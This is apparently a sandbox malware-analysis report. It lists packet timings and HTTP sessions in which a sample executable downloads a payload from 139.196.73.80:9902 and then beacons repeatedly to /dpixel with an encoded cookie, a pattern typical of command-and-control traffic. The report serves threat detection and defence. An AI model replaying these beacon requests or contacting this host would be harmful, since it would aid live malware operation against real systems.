Apr 17, 2024 07:08:39.267770052 CEST	9902	49818	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:39.267993927 CEST	49818	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:39.268362999 CEST	49818	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:39.579679966 CEST	9902	49818	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:39.582314014 CEST	9902	49818	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:39.582329988 CEST	9902	49818	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:39.582412004 CEST	49818	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:39.582412004 CEST	49818	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:39.582571983 CEST	49818	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:39.691031933 CEST	49819	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:39.900127888 CEST	9902	49818	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:40.038965940 CEST	9902	49819	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:40.039172888 CEST	49819	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:40.039388895 CEST	49819	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:40.366965055 CEST	9902	49819	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:40.369910955 CEST	9902	49819	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:40.369954109 CEST	9902	49819	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:40.370040894 CEST	49819	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:40.370040894 CEST	49819	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:40.370193005 CEST	49819	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:40.486686945 CEST	49820	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:40.694725037 CEST	9902	49819	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:40.813004971 CEST	9902	49820	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:40.813136101 CEST	49820	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:40.813321114 CEST	49820	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:41.139523029 CEST	9902	49820	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:41.143122911 CEST	9902	49820	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:41.143165112 CEST	9902	49820	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:41.143352032 CEST	49820	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:41.143352032 CEST	49820	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:41.143352032 CEST	49820	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:41.252615929 CEST	49821	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:41.470220089 CEST	9902	49820	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:41.574219942 CEST	9902	49821	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:41.574426889 CEST	49821	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:41.574521065 CEST	49821	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:41.906730890 CEST	9902	49821	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:41.909491062 CEST	9902	49821	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:41.909545898 CEST	9902	49821	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:41.911724091 CEST	49821	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:41.912837029 CEST	49821	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.026427031 CEST	49822	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.376741886 CEST	9902	49822	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:42.376979113 CEST	49822	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.377137899 CEST	49822	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.577867031 CEST	9902	49821	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:42.578094959 CEST	49821	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.718569040 CEST	9902	49822	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:42.720326900 CEST	49821	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.726860046 CEST	9902	49822	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:42.726933002 CEST	49822	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.727024078 CEST	9902	49822	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:42.727065086 CEST	49822	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.793694019 CEST	49822	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:42.913657904 CEST	49823	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:43.043248892 CEST	9902	49821	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:43.140018940 CEST	9902	49822	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:43.252471924 CEST	9902	49823	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:43.252679110 CEST	49823	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:44.290832043 CEST	49823	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:44.636477947 CEST	9902	49823	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:44.640758991 CEST	9902	49823	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:44.640774012 CEST	9902	49823	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:44.640928030 CEST	49823	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:44.640928984 CEST	49823	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:44.640984058 CEST	49823	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:44.752151012 CEST	49824	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:45.000356913 CEST	9902	49823	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:45.072213888 CEST	9902	49824	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:45.072393894 CEST	49824	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:45.072850943 CEST	49824	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:45.393027067 CEST	9902	49824	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:45.395587921 CEST	9902	49824	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:45.395603895 CEST	9902	49824	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:45.395705938 CEST	49824	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:45.396075964 CEST	49824	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:45.502258062 CEST	49825	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:45.714179993 CEST	9902	49824	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:46.501605034 CEST	49825	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:48.501715899 CEST	49825	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:48.829608917 CEST	9902	49825	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:48.830063105 CEST	49825	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:48.830288887 CEST	49825	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:49.160202980 CEST	9902	49825	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:49.162866116 CEST	9902	49825	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:49.162883043 CEST	9902	49825	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:49.162957907 CEST	49825	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:49.162957907 CEST	49825	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:49.163129091 CEST	49825	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:49.267920017 CEST	49826	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:49.500977039 CEST	9902	49825	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:49.584161997 CEST	9902	49826	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:49.584270000 CEST	49826	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:49.584428072 CEST	49826	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:49.900146008 CEST	9902	49826	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:49.904066086 CEST	9902	49826	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:49.904081106 CEST	9902	49826	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:49.904143095 CEST	49826	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:49.904305935 CEST	49826	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:50.017683029 CEST	49827	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:50.220019102 CEST	9902	49826	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:50.360702038 CEST	9902	49827	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:50.360873938 CEST	49827	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:50.361104965 CEST	49827	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:50.699301004 CEST	9902	49827	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:50.702339888 CEST	9902	49827	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:50.702357054 CEST	9902	49827	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:50.702404022 CEST	49827	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:50.702447891 CEST	49827	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:50.702528954 CEST	49827	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:50.814857006 CEST	49828	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:51.047568083 CEST	9902	49827	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:51.829698086 CEST	49828	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:53.829796076 CEST	49828	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:54.177202940 CEST	9902	49828	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:54.177294970 CEST	49828	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:54.177454948 CEST	49828	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:54.500058889 CEST	9902	49828	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:54.504273891 CEST	9902	49828	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:54.504318953 CEST	9902	49828	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:54.504434109 CEST	49828	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:54.504488945 CEST	49828	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:54.504825115 CEST	49828	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:54.611577034 CEST	49829	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:54.832226992 CEST	9902	49828	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:54.949635983 CEST	9902	49829	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:54.949774027 CEST	49829	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:54.949909925 CEST	49829	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:55.276958942 CEST	9902	49829	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:55.277009964 CEST	9902	49829	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:55.279903889 CEST	9902	49829	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:55.279942989 CEST	9902	49829	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:55.279969931 CEST	49829	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:55.280013084 CEST	49829	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:55.280119896 CEST	49829	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:55.393086910 CEST	49830	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:55.617605925 CEST	9902	49829	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:55.728816986 CEST	9902	49830	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:55.728961945 CEST	49830	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:55.729159117 CEST	49830	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.065160036 CEST	9902	49830	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:56.068420887 CEST	9902	49830	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:56.068461895 CEST	9902	49830	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:56.068509102 CEST	49830	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.068649054 CEST	49830	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.068649054 CEST	49830	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.174624920 CEST	49831	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.410669088 CEST	9902	49830	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:56.535821915 CEST	9902	49831	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:56.535908937 CEST	49831	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.536055088 CEST	49831	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.916862011 CEST	9902	49831	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:56.919713020 CEST	9902	49831	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:56.919754028 CEST	9902	49831	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:56.919783115 CEST	49831	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.919851065 CEST	49831	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:56.919878006 CEST	49831	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:57.034849882 CEST	49832	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:57.290031910 CEST	9902	49831	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:57.353707075 CEST	9902	49832	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:57.353913069 CEST	49832	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:57.354185104 CEST	49832	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:57.685307980 CEST	9902	49832	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:57.688183069 CEST	9902	49832	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:57.688230991 CEST	9902	49832	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:57.688308954 CEST	49832	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:57.688308954 CEST	49832	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:57.688401937 CEST	49832	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:57.799686909 CEST	49833	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:58.010571957 CEST	9902	49832	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:58.138329983 CEST	9902	49833	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:58.138540983 CEST	49833	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:58.138751030 CEST	49833	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:58.484385967 CEST	9902	49833	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:58.486991882 CEST	9902	49833	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:58.487052917 CEST	9902	49833	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:58.487157106 CEST	49833	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:58.487157106 CEST	49833	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:58.487212896 CEST	49833	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:58.597498894 CEST	49834	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:58.835191011 CEST	9902	49833	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:58.937438965 CEST	9902	49834	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:58.937530041 CEST	49834	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:58.939323902 CEST	49834	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:59.266942978 CEST	9902	49834	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:59.269448996 CEST	9902	49834	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:59.269491911 CEST	9902	49834	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:59.269697905 CEST	49834	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:59.269766092 CEST	49834	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:59.269766092 CEST	49834	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:59.378034115 CEST	49835	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:59.609422922 CEST	9902	49834	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:59.707117081 CEST	9902	49835	139.196.73.80	192.168.2.4
Apr 17, 2024 07:08:59.707217932 CEST	49835	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:08:59.707384109 CEST	49835	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:00.036148071 CEST	9902	49835	139.196.73.80	192.168.2.4
Apr 17, 2024 07:09:00.039742947 CEST	9902	49835	139.196.73.80	192.168.2.4
Apr 17, 2024 07:09:00.039793015 CEST	9902	49835	139.196.73.80	192.168.2.4
Apr 17, 2024 07:09:00.039982080 CEST	49835	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:00.040035009 CEST	49835	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:00.143342018 CEST	49836	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:00.368963957 CEST	9902	49835	139.196.73.80	192.168.2.4
Apr 17, 2024 07:09:00.456619978 CEST	9902	49836	139.196.73.80	192.168.2.4
Apr 17, 2024 07:09:00.456789017 CEST	49836	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:00.456904888 CEST	49836	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:00.768990040 CEST	9902	49836	139.196.73.80	192.168.2.4
Apr 17, 2024 07:09:00.771697044 CEST	9902	49836	139.196.73.80	192.168.2.4
Apr 17, 2024 07:09:00.771717072 CEST	9902	49836	139.196.73.80	192.168.2.4
Apr 17, 2024 07:09:00.771747112 CEST	49836	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:00.771769047 CEST	49836	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:00.860130072 CEST	49836	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:09:01.172300100 CEST	9902	49836	139.196.73.80	192.168.2.4

HTTP Request Dependency Graph

139.196.73.80:9902

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:06:56.450278997 CEST	181	OUT	GET /WNwA HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:06:56.791157007 CEST	120	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:06:56 GMT Content-Type: application/octet-stream Content-Length: 277063

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:06:58.478607893 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:06:59.204116106 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:06:59.554333925 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:06:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:01.030991077 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:01.371771097 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:01.834573984 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:02.187839031 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:02.634912968 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:02.972457886 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:03.429785967 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:03.761327982 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:04.215245962 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:04.553028107 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:04.974793911 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:05.294486046 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:05.739805937 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:06.076807976 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:07:06.538966894 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:07:06.869868040 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:07:06 GMT Content-Type: application/octet-stream Content-Length: 0

